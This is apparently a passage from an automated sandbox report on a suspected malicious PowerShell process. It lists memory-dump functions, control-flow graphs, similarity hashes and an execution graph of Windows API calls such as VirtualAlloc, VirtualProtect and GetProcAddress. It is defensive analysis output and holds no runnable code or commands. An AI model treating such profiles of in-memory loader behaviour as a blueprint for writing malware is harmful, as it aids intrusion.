                                                                  • Instruction Fuzzy Hash: F071173060CB8D4FDB69DF68C8557E43BE1FF59311F1442AAE84DC72A2DA74E8418B92
                                                                  Function 00007FFD9B8AE8AC Relevance: 1.7, APIs: 1, Instructions: 227fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 487 7ffd9b8ae8ac-7ffd9b8ae8b3 488 7ffd9b8ae8b5-7ffd9b8ae8bd 487->488 489 7ffd9b8ae8be-7ffd9b8ae8fd 487->489 488->489 491 7ffd9b8ae8ff-7ffd9b8ae90b 489->491 492 7ffd9b8ae90d-7ffd9b8ae957 489->492 491->492 495 7ffd9b8ae959-7ffd9b8ae968 492->495 496 7ffd9b8ae9b2-7ffd9b8aea4a CreateFileA 492->496 495->496 497 7ffd9b8ae96a-7ffd9b8ae96d 495->497 503 7ffd9b8aea4c 496->503 504 7ffd9b8aea52-7ffd9b8aea86 call 7ffd9b8aeaaa 496->504 498 7ffd9b8ae9a7-7ffd9b8ae9af 497->498 499 7ffd9b8ae96f-7ffd9b8ae982 497->499 498->496 501 7ffd9b8ae986-7ffd9b8ae999 499->501 502 7ffd9b8ae984 499->502 501->501 505 7ffd9b8ae99b-7ffd9b8ae9a3 501->505 502->501 503->504 509 7ffd9b8aea88-7ffd9b8aea8e 504->509 510 7ffd9b8aea96-7ffd9b8aeaa9 504->510 505->498 511 7ffd9b8aea95 509->511 512 7ffd9b8aea90 509->512 511->510 512->511
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 5d2aaadcfbf7bed7488837038e5e7fe367fb4b7def2474f875ef0d9cb048d716
                                                                  • Instruction ID: f7fa26eda4a65b94d916b46a3e5e018f83bd294d582d68f78acdf80fbce57758
                                                                  • Opcode Fuzzy Hash: 5d2aaadcfbf7bed7488837038e5e7fe367fb4b7def2474f875ef0d9cb048d716
                                                                  • Instruction Fuzzy Hash: 5861E830918B8D8FEB68DF58C8557E437E0FF59311F14427AE84DC7292DA74E9418B91
                                                                  Function 00007FFD9B8AED66 Relevance: 1.6, APIs: 1, Instructions: 136fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 537 7ffd9b8aed66-7ffd9b8aed73 538 7ffd9b8aed75-7ffd9b8aed7d 537->538 539 7ffd9b8aed7e-7ffd9b8aed8f 537->539 538->539 540 7ffd9b8aed9a-7ffd9b8aee51 MapViewOfFile 539->540 541 7ffd9b8aed91-7ffd9b8aed99 539->541 545 7ffd9b8aee59-7ffd9b8aee76 540->545 546 7ffd9b8aee53 540->546 541->540 546->545
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: FileView
                                                                  • String ID:
                                                                  • API String ID: 3314676101-0
                                                                  • Opcode ID: 2ce88bbfc47cdf0195d36a6c257645c301ae720685f249722fc3820e0de2beb1
                                                                  • Instruction ID: 8bfdbb5f966ecbb7ec88250ae8b6646f9ab71172c5f5a72f8a55ac203d249197
                                                                  • Opcode Fuzzy Hash: 2ce88bbfc47cdf0195d36a6c257645c301ae720685f249722fc3820e0de2beb1
                                                                  • Instruction Fuzzy Hash: 4A41283190CA889FDB19DBA8D8066E87BF0FF5A321F14026ED089C31A2CB646852C791
                                                                  Function 00007FFD9B8AE7A8 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 547 7ffd9b8ae7a8-7ffd9b8ae7af 548 7ffd9b8ae7ba-7ffd9b8ae870 K32GetModuleInformation 547->548 549 7ffd9b8ae7b1-7ffd9b8ae7b9 547->549 553 7ffd9b8ae878-7ffd9b8ae8a7 548->553 554 7ffd9b8ae872 548->554 549->548 554->553
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: InformationModule
                                                                  • String ID:
                                                                  • API String ID: 3425974696-0
                                                                  • Opcode ID: 5e106f72d836d01dbed32f4eaaac85659e73fd1939fa31352c63372dbdf9f4bf
                                                                  • Instruction ID: 2a5f633fa1954ef3de621ad6af8479464c5def06d95f382ffdaf73888214d0ea
                                                                  • Opcode Fuzzy Hash: 5e106f72d836d01dbed32f4eaaac85659e73fd1939fa31352c63372dbdf9f4bf
                                                                  • Instruction Fuzzy Hash: D2312430A0CA4C8FDB1CDBAC98456F9BBE1EF59321F00426FD049C3292DB74A8468B81
                                                                  Function 00007FFD9BB456CC Relevance: .9, Instructions: 939COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 601 7ffd9bb456cc-7ffd9bb456d8 602 7ffd9bb45730-7ffd9bb45734 601->602 603 7ffd9bb456da-7ffd9bb456f0 601->603 606 7ffd9bb4574d-7ffd9bb45752 602->606 607 7ffd9bb45736-7ffd9bb45743 602->607 604 7ffd9bb456f2-7ffd9bb45724 603->604 605 7ffd9bb45748-7ffd9bb4574b 603->605 620 7ffd9bb4582d-7ffd9bb4586c 604->620 621 7ffd9bb4572a-7ffd9bb4572f 604->621 605->606 608 7ffd9bb457ce-7ffd9bb457d8 606->608 609 7ffd9bb45754-7ffd9bb45757 606->609 607->606 617 7ffd9bb45745 607->617 614 7ffd9bb457e7-7ffd9bb4582a 608->614 615 7ffd9bb457da-7ffd9bb457e6 608->615 612 7ffd9bb4577e 609->612 613 7ffd9bb45759-7ffd9bb4577c 609->613 619 7ffd9bb45780-7ffd9bb45782 612->619 613->619 614->620 617->605 619->608 623 7ffd9bb45784-7ffd9bb45787 619->623 632 7ffd9bb4586e-7ffd9bb45887 620->632 633 7ffd9bb458cd-7ffd9bb458dd 620->633 621->602 623->608 626 7ffd9bb45789-7ffd9bb4578c 623->626 626->608 628 7ffd9bb4578e-7ffd9bb45798 626->628 628->608 636 7ffd9bb4579a-7ffd9bb457cd 628->636 645 7ffd9bb458b2-7ffd9bb458be 632->645 646 7ffd9bb45889-7ffd9bb458b0 632->646 637 7ffd9bb458e0-7ffd9bb458f1 633->637 638 7ffd9bb458df 633->638 639 7ffd9bb458f4-7ffd9bb45911 637->639 640 7ffd9bb458f3 637->640 638->637 643 7ffd9bb458c0-7ffd9bb458c4 639->643 644 7ffd9bb45913-7ffd9bb45987 639->644 640->639 643->633 654 7ffd9bb45adf-7ffd9bb45b1e 644->654 655 7ffd9bb4598d-7ffd9bb45997 644->655 645->643 646->645 667 7ffd9bb45b20-7ffd9bb45b39 654->667 668 7ffd9bb45b7f-7ffd9bb45b91 654->668 657 7ffd9bb459b3-7ffd9bb459c0 655->657 658 7ffd9bb45999-7ffd9bb459b1 655->658 665 7ffd9bb45a80-7ffd9bb45a8a 657->665 666 7ffd9bb459c6-7ffd9bb459c9 657->666 658->657 669 7ffd9bb45a8c-7ffd9bb45a98 665->669 670 7ffd9bb45a99-7ffd9bb45adc 665->670 666->665 671 7ffd9bb459cf-7ffd9bb459d7 666->671 686 7ffd9bb45b64-7ffd9bb45b70 667->686 687 7ffd9bb45b3b-7ffd9bb45b62 667->687 675 7ffd9bb45b94-7ffd9bb45ba5 668->675 676 7ffd9bb45b93 668->676 670->654 671->654 672 7ffd9bb459dd-7ffd9bb459e7 671->672 677 7ffd9bb45a00-7ffd9bb45a04 672->677 678 7ffd9bb459e9-7ffd9bb459fe 672->678 679 7ffd9bb45ba8-7ffd9bb45bc9 675->679 680 7ffd9bb45ba7 675->680 676->675 677->665 685 7ffd9bb45a06-7ffd9bb45a09 677->685 678->677 683 7ffd9bb45b78-7ffd9bb45b7e 679->683 684 7ffd9bb45bcb-7ffd9bb45bdc 679->684 680->679 683->668 692 7ffd9bb45bde-7ffd9bb45be4 684->692 693 7ffd9bb45c39-7ffd9bb45c3a 684->693 690 7ffd9bb45a30 685->690 691 7ffd9bb45a0b-7ffd9bb45a2e 685->691 686->683 687->686 695 7ffd9bb45a32-7ffd9bb45a34 690->695 691->695 698 7ffd9bb45c41-7ffd9bb45c4a 692->698 699 7ffd9bb45be6-7ffd9bb45c37 692->699 701 7ffd9bb45d82-7ffd9bb45e4b 693->701 702 7ffd9bb45c3b-7ffd9bb45c40 693->702 695->665 703 7ffd9bb45a36-7ffd9bb45a59 695->703 707 7ffd9bb45c63-7ffd9bb45c68 698->707 708 7ffd9bb45c4c-7ffd9bb45c61 698->708 699->693 702->698 715 7ffd9bb45a72-7ffd9bb45a7f 703->715 716 7ffd9bb45a5b-7ffd9bb45a68 703->716 710 7ffd9bb45c6e-7ffd9bb45c71 707->710 711 7ffd9bb45d22-7ffd9bb45d2c 707->711 708->707 717 7ffd9bb45c73-7ffd9bb45c82 710->717 718 7ffd9bb45cb6 710->718 719 7ffd9bb45d2e-7ffd9bb45d3c 711->719 720 7ffd9bb45d3d-7ffd9bb45d7f 711->720 716->715 726 7ffd9bb45a6a-7ffd9bb45a70 716->726 717->701 730 7ffd9bb45c86-7ffd9bb45c92 717->730 723 7ffd9bb45cb8-7ffd9bb45cba 718->723 720->701 723->711 728 7ffd9bb45cbc-7ffd9bb45cc2 723->728 726->715 732 7ffd9bb45cc4-7ffd9bb45cdf 728->732 733 7ffd9bb45ce1-7ffd9bb45cf4 728->733 735 7ffd9bb45c94-7ffd9bb45ca4 730->735 736 7ffd9bb45cab-7ffd9bb45cb4 730->736 732->733 743 7ffd9bb45d0d-7ffd9bb45d21 733->743 744 7ffd9bb45cf6-7ffd9bb45d03 733->744 735->730 745 7ffd9bb45ca6-7ffd9bb45ca9 735->745 736->723 744->743 749 7ffd9bb45d05-7ffd9bb45d0b 744->749 745->736 749->743
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1944302520.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9bb40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d915adafcaea91732edb89a501f30e248d9a4e19b717363bafcf9bae59a9c588
                                                                  • Instruction ID: 99893f5937beaf0857bb17654786570c89687423814fb5e98545489f4e46d95f
                                                                  • Opcode Fuzzy Hash: d915adafcaea91732edb89a501f30e248d9a4e19b717363bafcf9bae59a9c588
                                                                  • Instruction Fuzzy Hash: F6427922B0EF8D0FEBA69A6858645B57BE2FF56214B0901FBD44CC71E3EE18AD05C351
                                                                  Function 00007FFD9B972871 Relevance: .1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1912877628.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2f4ddefec7e1a7b386adb115be32188378721e1a76de934bbd9f52528f5bb91
                                                                  • Instruction ID: cb77e874ce6a89883b4b21bac97cd184898fb180d0907eccd11804a292bfab8f
                                                                  • Opcode Fuzzy Hash: a2f4ddefec7e1a7b386adb115be32188378721e1a76de934bbd9f52528f5bb91
                                                                  • Instruction Fuzzy Hash: 5121F252F2FBCA1FE3A597A828A41A477C1EF66360B1901FAD46DCB2E7ED195C058301

                                                                  Execution Graph

                                                                  Execution Coverage:0.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:2.2%
                                                                  Total number of Nodes:1428
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 8264 2408a295ce9 8265 2408a295cf0 VirtualProtect 8264->8265 8266 2408a295d19 GetLastError 8265->8266 8267 2408a295c00 8265->8267 8266->8267 8268 2408a293ee9 8269 2408a293e36 8268->8269 8270 2408a293e86 VirtualQuery 8269->8270 8271 2408a293ea0 8269->8271 8272 2408a293eba VirtualAlloc 8269->8272 8270->8269 8270->8271 8272->8271 8273 2408a293eeb GetLastError 8272->8273 8273->8269 8273->8271 8914 2408a292b68 8916 2408a292bc5 8914->8916 8915 2408a292be0 8916->8915 8917 2408a2934ac 3 API calls 8916->8917 8917->8915 7637 2408a297c60 7638 2408a297c7c 7637->7638 7639 2408a297c81 7637->7639 7641 2408a297d90 7638->7641 7642 2408a297db3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7641->7642 7643 2408a297e27 7641->7643 7642->7643 7643->7639 7644 2408a29fc60 GetProcessHeap 7645 2408a295664 7646 2408a29566a 7645->7646 7657 2408a297ca0 7646->7657 7650 2408a2956ce 7651 2408a295767 7651->7650 7654 2408a2958ed 7651->7654 7670 2408a297870 7651->7670 7653 2408a2959eb 7654->7653 7655 2408a295a67 VirtualProtect 7654->7655 7655->7650 7656 2408a295a93 GetLastError 7655->7656 7656->7650 7658 2408a297cab 7657->7658 7659 2408a2956ad 7658->7659 7661 2408a297cca 7658->7661 7676 2408a29bc8c 7658->7676 7659->7650 7666 2408a2940f0 7659->7666 7662 2408a297cd5 7661->7662 7679 2408a2984cc 7661->7679 7683 2408a2984ec 7662->7683 7667 2408a29410d 7666->7667 7669 2408a29417c 7667->7669 7698 2408a294360 7667->7698 7669->7651 7671 2408a2978b7 7670->7671 7723 2408a297640 7671->7723 7687 2408a29bccc 7676->7687 7680 2408a2984da std::bad_alloc::bad_alloc 7679->7680 7693 2408a2998d0 7680->7693 7682 2408a2984eb 7684 2408a2984fa std::bad_alloc::bad_alloc 7683->7684 7685 2408a2998d0 Concurrency::cancel_current_task 2 API calls 7684->7685 7686 2408a297cdb 7685->7686 7692 2408a29cdcc EnterCriticalSection 7687->7692 7694 2408a2998ef 7693->7694 7695 2408a299918 RtlPcToFileHeader 7694->7695 7696 2408a29993a RaiseException 7694->7696 7697 2408a299930 7695->7697 7696->7682 7697->7696 7699 2408a294384 7698->7699 7700 2408a2943a7 7698->7700 7699->7700 7712 2408a293e10 7699->7712 7705 2408a2943dd 7700->7705 7718 2408a293f40 7700->7718 7703 2408a294443 7707 2408a29445f 7703->7707 7710 2408a293e10 3 API calls 7703->7710 7704 2408a29440d 7704->7703 7709 2408a293e10 3 API calls 7704->7709 7705->7704 7706 2408a293f40 2 API calls 7705->7706 7706->7704 7708 2408a29447b 7707->7708 7711 2408a293f40 2 API calls 7707->7711 7708->7669 7709->7703 7710->7707 7711->7708 7713 2408a293e31 7712->7713 7714 2408a293e86 VirtualQuery 7713->7714 7715 2408a293ea0 7713->7715 7716 2408a293eba VirtualAlloc 7713->7716 7714->7713 7714->7715 7715->7700 7716->7715 7717 2408a293eeb GetLastError 7716->7717 7717->7713 7717->7715 7721 2408a293f58 7718->7721 7719 2408a293fc7 7719->7705 7720 2408a293fad VirtualQuery 7720->7719 7720->7721 7721->7719 7721->7720 7722 2408a294012 GetLastError 7721->7722 7722->7719 7722->7721 7724 2408a29765b 7723->7724 7725 2408a29767f 7724->7725 7726 2408a297671 SetLastError 7724->7726 7727 2408a297d70 7725->7727 7726->7725 7728 2408a297d79 7727->7728 7729 2408a2978e1 7728->7729 7730 2408a29855c IsProcessorFeaturePresent 7728->7730 7729->7651 7731 2408a298574 7730->7731 7736 2408a298750 RtlCaptureContext 7731->7736 7737 2408a29876a RtlLookupFunctionEntry 7736->7737 7738 2408a298587 7737->7738 7739 2408a298780 RtlVirtualUnwind 7737->7739 7740 2408a298528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7738->7740 7739->7737 7739->7738 7741 2408a299664 7748 2408a299bac 7741->7748 7744 2408a299671 7751 2408a299bb4 7748->7751 7750 2408a299be5 7753 2408a299bf4 __vcrt_uninitialize_locks DeleteCriticalSection 7750->7753 7751->7750 7752 2408a29966d 7751->7752 7765 2408a29a470 7751->7765 7752->7744 7754 2408a299b40 7752->7754 7753->7752 7779 2408a29a344 7754->7779 7770 2408a29a1f4 7765->7770 7768 2408a29a4bb InitializeCriticalSectionAndSpinCount 7769 2408a29a4b0 7768->7769 7769->7751 7771 2408a29a30e 7770->7771 7776 2408a29a238 __vcrt_FlsAlloc 7770->7776 7771->7768 7771->7769 7772 2408a29a266 LoadLibraryExW 7774 2408a29a2dd 7772->7774 7775 2408a29a287 GetLastError 7772->7775 7773 2408a29a2fd GetProcAddress 7773->7771 7774->7773 7777 2408a29a2f4 FreeLibrary 7774->7777 7775->7776 7776->7771 7776->7772 7776->7773 7778 2408a29a2a9 LoadLibraryExW 7776->7778 7777->7773 7778->7774 7778->7776 7780 2408a29a1f4 __vcrt_FlsAlloc 5 API calls 7779->7780 7781 2408a29a369 TlsAlloc 7780->7781 8918 2408a29c964 8921 2408a29c714 8918->8921 8928 2408a29c6dc 8921->8928 8926 2408a29c698 11 API calls 8927 2408a29c747 8926->8927 8929 2408a29c6ec 8928->8929 8930 2408a29c6f1 8928->8930 8931 2408a29c698 11 API calls 8929->8931 8932 2408a29c6f8 8930->8932 8931->8930 8933 2408a29c708 8932->8933 8934 2408a29c70d 8932->8934 8935 2408a29c698 11 API calls 8933->8935 8934->8926 8935->8934 8936 2408a2a5165 8937 2408a299a64 __CxxCallCatchBlock 9 API calls 8936->8937 8938 2408a2a517d 8937->8938 8939 2408a299a64 __CxxCallCatchBlock 9 API calls 8938->8939 8940 2408a2a5198 8939->8940 8941 2408a299a64 __CxxCallCatchBlock 9 API calls 8940->8941 8942 2408a2a51ac 8941->8942 8943 2408a299a64 __CxxCallCatchBlock 9 API calls 8942->8943 8944 2408a2a51ee 8943->8944 9258 2408a2923f8 9259 2408a292476 9258->9259 9260 2408a2924db GetFileType 9259->9260 9265 2408a2925b2 9259->9265 9261 2408a2924e9 StrCpyW 9260->9261 9262 2408a2924fd 9260->9262 9266 2408a29250a 9261->9266 9269 2408a2919d8 GetFinalPathNameByHandleW 9262->9269 9264 2408a293c74 StrCmpNIW 9264->9266 9266->9264 9266->9265 9274 2408a29330c StrCmpIW 9266->9274 9278 2408a291cd8 9266->9278 9270 2408a291a41 9269->9270 9271 2408a291a02 StrCmpNIW 9269->9271 9270->9266 9271->9270 9272 2408a291a1c lstrlenW 9271->9272 9272->9270 9273 2408a291a2e StrCpyW 9272->9273 9273->9270 9275 2408a29333e StrCpyW StrCatW 9274->9275 9276 2408a293355 PathCombineW 9274->9276 9277 2408a29335e 9275->9277 9276->9277 9277->9266 9279 2408a291cef 9278->9279 9280 2408a291cf8 9278->9280 9281 2408a29152c 2 API calls 9279->9281 9280->9266 9281->9280 8945 2408a29597d 8947 2408a295984 8945->8947 8946 2408a2959eb 8947->8946 8948 2408a295a67 VirtualProtect 8947->8948 8949 2408a295aa1 8948->8949 8950 2408a295a93 GetLastError 8948->8950 8950->8949 9282 2408a29c9fc 9283 2408a29db74 __free_lconv_mon 11 API calls 9282->9283 9284 2408a29ca0c 9283->9284 9285 2408a29db74 __free_lconv_mon 11 API calls 9284->9285 9286 2408a29ca20 9285->9286 9287 2408a29db74 __free_lconv_mon 11 API calls 9286->9287 9288 2408a29ca34 9287->9288 9289 2408a29db74 __free_lconv_mon 11 API calls 9288->9289 9290 2408a29ca48 9289->9290 7783 2408a2a1470 7784 2408a2a148f 7783->7784 7785 2408a2a1508 7784->7785 7788 2408a2a149f 7784->7788 7791 2408a298630 7785->7791 7789 2408a297d70 _log10_special 8 API calls 7788->7789 7790 2408a2a14fe 7789->7790 7794 2408a298644 IsProcessorFeaturePresent 7791->7794 7795 2408a29865b 7794->7795 7800 2408a2986e0 RtlCaptureContext RtlLookupFunctionEntry 7795->7800 7801 2408a298710 RtlVirtualUnwind 7800->7801 7802 2408a29866f 7800->7802 7801->7802 7803 2408a298528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7802->7803 7804 2408a2a0070 7805 2408a2a00a0 7804->7805 7807 2408a2a00c7 7804->7807 7805->7807 7811 2408a2a00b4 7805->7811 7827 2408a29d3d0 GetLastError 7805->7827 7808 2408a2a019c 7807->7808 7850 2408a29cdcc EnterCriticalSection 7807->7850 7812 2408a2a02d0 7808->7812 7813 2408a2a0203 7808->7813 7819 2408a2a01ca 7808->7819 7809 2408a2a0104 7811->7807 7811->7809 7815 2408a2a0149 7811->7815 7814 2408a2a02dd 7812->7814 7888 2408a29ce20 LeaveCriticalSection 7812->7888 7820 2408a2a0261 7813->7820 7887 2408a29ce20 LeaveCriticalSection 7813->7887 7844 2408a29dadc 7815->7844 7819->7813 7851 2408a29d258 GetLastError 7819->7851 7824 2408a29d258 23 API calls _invalid_parameter_noinfo 7820->7824 7824->7820 7825 2408a2a01f3 7826 2408a29d258 _invalid_parameter_noinfo 23 API calls 7825->7826 7826->7813 7828 2408a29d411 FlsSetValue 7827->7828 7833 2408a29d3f4 7827->7833 7829 2408a29d423 7828->7829 7834 2408a29d401 SetLastError 7828->7834 7889 2408a29dafc 7829->7889 7833->7828 7833->7834 7834->7811 7835 2408a29d450 FlsSetValue 7838 2408a29d46e 7835->7838 7839 2408a29d45c FlsSetValue 7835->7839 7836 2408a29d440 FlsSetValue 7837 2408a29d449 7836->7837 7896 2408a29db74 7837->7896 7902 2408a29cfc4 7838->7902 7839->7837 7845 2408a29d3d0 __std_exception_copy 11 API calls 7844->7845 7846 2408a29dae5 7845->7846 7847 2408a29d9a0 7846->7847 7921 2408a29d838 7847->7921 7852 2408a29d299 FlsSetValue 7851->7852 7853 2408a29d27c FlsGetValue 7851->7853 7855 2408a29d2ab 7852->7855 7870 2408a29d289 7852->7870 7854 2408a29d293 7853->7854 7853->7870 7854->7852 7857 2408a29dafc _invalid_parameter_noinfo 11 API calls 7855->7857 7856 2408a29d305 SetLastError 7859 2408a29d312 7856->7859 7865 2408a29d325 7856->7865 7858 2408a29d2ba 7857->7858 7860 2408a29d2d8 FlsSetValue 7858->7860 7861 2408a29d2c8 FlsSetValue 7858->7861 7859->7825 7863 2408a29d2f6 7860->7863 7864 2408a29d2e4 FlsSetValue 7860->7864 7862 2408a29d2d1 7861->7862 7866 2408a29db74 __free_lconv_mon 11 API calls 7862->7866 7867 2408a29cfc4 _invalid_parameter_noinfo 11 API calls 7863->7867 7864->7862 7868 2408a29d358 FlsSetValue 7865->7868 7869 2408a29d33d FlsGetValue 7865->7869 7866->7870 7871 2408a29d2fe 7867->7871 7873 2408a29d365 7868->7873 7876 2408a29d34a 7868->7876 7872 2408a29d352 7869->7872 7869->7876 7870->7856 7874 2408a29db74 __free_lconv_mon 11 API calls 7871->7874 7872->7868 7875 2408a29dafc _invalid_parameter_noinfo 11 API calls 7873->7875 7874->7856 7877 2408a29d374 7875->7877 7876->7825 7878 2408a29d392 FlsSetValue 7877->7878 7879 2408a29d382 FlsSetValue 7877->7879 7881 2408a29d39e FlsSetValue 7878->7881 7882 2408a29d3b0 7878->7882 7880 2408a29d38b 7879->7880 7884 2408a29db74 __free_lconv_mon 11 API calls 7880->7884 7881->7880 7883 2408a29cfc4 _invalid_parameter_noinfo 11 API calls 7882->7883 7885 2408a29d3b8 7883->7885 7884->7876 7886 2408a29db74 __free_lconv_mon 11 API calls 7885->7886 7886->7876 7894 2408a29db0d _invalid_parameter_noinfo 7889->7894 7890 2408a29db5e 7892 2408a29dadc __std_exception_copy 10 API calls 7890->7892 7891 2408a29db42 HeapAlloc 7893 2408a29d432 7891->7893 7891->7894 7892->7893 7893->7835 7893->7836 7894->7890 7894->7891 7895 2408a29bc8c _invalid_parameter_noinfo 2 API calls 7894->7895 7895->7894 7897 2408a29db79 HeapFree 7896->7897 7898 2408a29dbaa 7896->7898 7897->7898 7899 2408a29db94 GetLastError 7897->7899 7898->7834 7900 2408a29dba1 __free_lconv_mon 7899->7900 7901 2408a29dadc __std_exception_copy 9 API calls 7900->7901 7901->7898 7907 2408a29ce9c 7902->7907 7919 2408a29cdcc EnterCriticalSection 7907->7919 7922 2408a29d863 7921->7922 7929 2408a29d8d4 7922->7929 7926 2408a29d8ad 7927 2408a29cbd0 _invalid_parameter_noinfo 28 API calls 7926->7927 7928 2408a29d8c2 7926->7928 7927->7928 7928->7809 7952 2408a29d61c 7929->7952 7932 2408a29d88a 7932->7926 7939 2408a29cbd0 7932->7939 7940 2408a29cc28 7939->7940 7941 2408a29cbdf GetLastError 7939->7941 7940->7926 7942 2408a29cbf4 7941->7942 7943 2408a29d498 _invalid_parameter_noinfo 14 API calls 7942->7943 7944 2408a29cc0e SetLastError 7943->7944 7944->7940 7945 2408a29cc31 7944->7945 7946 2408a29cbd0 _invalid_parameter_noinfo 26 API calls 7945->7946 7947 2408a29cc57 7946->7947 7987 2408a2a0860 7947->7987 7953 2408a29d638 GetLastError 7952->7953 7954 2408a29d673 7952->7954 7955 2408a29d648 7953->7955 7954->7932 7958 2408a29d688 7954->7958 7965 2408a29d498 7955->7965 7959 2408a29d6bc 7958->7959 7960 2408a29d6a4 GetLastError SetLastError 7958->7960 7959->7932 7961 2408a29d9c0 IsProcessorFeaturePresent 7959->7961 7960->7959 7962 2408a29d9d3 7961->7962 7979 2408a29d6d4 7962->7979 7966 2408a29d4b7 FlsGetValue 7965->7966 7968 2408a29d4cc 7965->7968 7967 2408a29d4c4 SetLastError 7966->7967 7966->7968 7967->7954 7968->7967 7969 2408a29dafc _invalid_parameter_noinfo 11 API calls 7968->7969 7970 2408a29d4ee 7969->7970 7971 2408a29d50c FlsSetValue 7970->7971 7974 2408a29d4fc 7970->7974 7972 2408a29d52a 7971->7972 7973 2408a29d518 FlsSetValue 7971->7973 7975 2408a29cfc4 _invalid_parameter_noinfo 11 API calls 7972->7975 7973->7974 7976 2408a29db74 __free_lconv_mon 11 API calls 7974->7976 7977 2408a29d532 7975->7977 7976->7967 7978 2408a29db74 __free_lconv_mon 11 API calls 7977->7978 7978->7967 7980 2408a29d70e _invalid_parameter_noinfo 7979->7980 7981 2408a29d736 RtlCaptureContext RtlLookupFunctionEntry 7980->7981 7982 2408a29d770 RtlVirtualUnwind 7981->7982 7983 2408a29d7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7981->7983 7982->7983 7986 2408a29d7f8 _invalid_parameter_noinfo 7983->7986 7984 2408a297d70 _log10_special 8 API calls 7985 2408a29d817 GetCurrentProcess TerminateProcess 7984->7985 7986->7984 7988 2408a2a0879 7987->7988 7989 2408a29cc7f 7987->7989 7988->7989 7995 2408a2a0e8c 7988->7995 7991 2408a2a08cc 7989->7991 7992 2408a2a08e5 7991->7992 7994 2408a29cc8f 7991->7994 7992->7994 8005 2408a29f120 7992->8005 7994->7926 7996 2408a29d258 _invalid_parameter_noinfo 23 API calls 7995->7996 7997 2408a2a0e9b 7996->7997 8003 2408a2a0ee1 7997->8003 8004 2408a29cdcc EnterCriticalSection 7997->8004 8003->7989 8006 2408a29d258 _invalid_parameter_noinfo 23 API calls 8005->8006 8007 2408a29f129 8006->8007 8951 2408a2a0f70 8952 2408a2a0f9d 8951->8952 8953 2408a29dadc __std_exception_copy 11 API calls 8952->8953 8958 2408a2a0fb2 8952->8958 8954 2408a2a0fa7 8953->8954 8955 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8954->8955 8955->8958 8956 2408a297d70 _log10_special 8 API calls 8957 2408a2a1370 8956->8957 8958->8956 9291 2408a292bf4 9292 2408a292c65 9291->9292 9293 2408a292f88 9292->9293 9294 2408a292c91 GetModuleHandleA 9292->9294 9295 2408a292ca3 GetProcAddress 9294->9295 9296 2408a292cb5 9294->9296 9295->9296 9296->9293 9297 2408a292cdc StrCmpNIW 9296->9297 9297->9293 9298 2408a292d01 9297->9298 9298->9293 9299 2408a291934 6 API calls 9298->9299 9300 2408a292e13 lstrlenW 9298->9300 9301 2408a292ebd lstrlenW 9298->9301 9302 2408a293c74 StrCmpNIW 9298->9302 9303 2408a291c00 StrCmpIW StrCmpW 9298->9303 9299->9298 9300->9298 9301->9298 9302->9298 9303->9298 7532 2408a291ac8 7539 2408a291628 GetProcessHeap HeapAlloc 7532->7539 7534 2408a291ad7 7535 2408a291ade SleepEx 7534->7535 7538 2408a291598 StrCmpIW StrCmpW 7534->7538 7590 2408a2918b4 7534->7590 7536 2408a291628 50 API calls 7535->7536 7536->7534 7538->7534 7607 2408a291268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7539->7607 7541 2408a291650 7608 2408a291000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7541->7608 7543 2408a291658 7609 2408a291268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7543->7609 7545 2408a291661 7610 2408a291268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7545->7610 7547 2408a29166a 7611 2408a291268 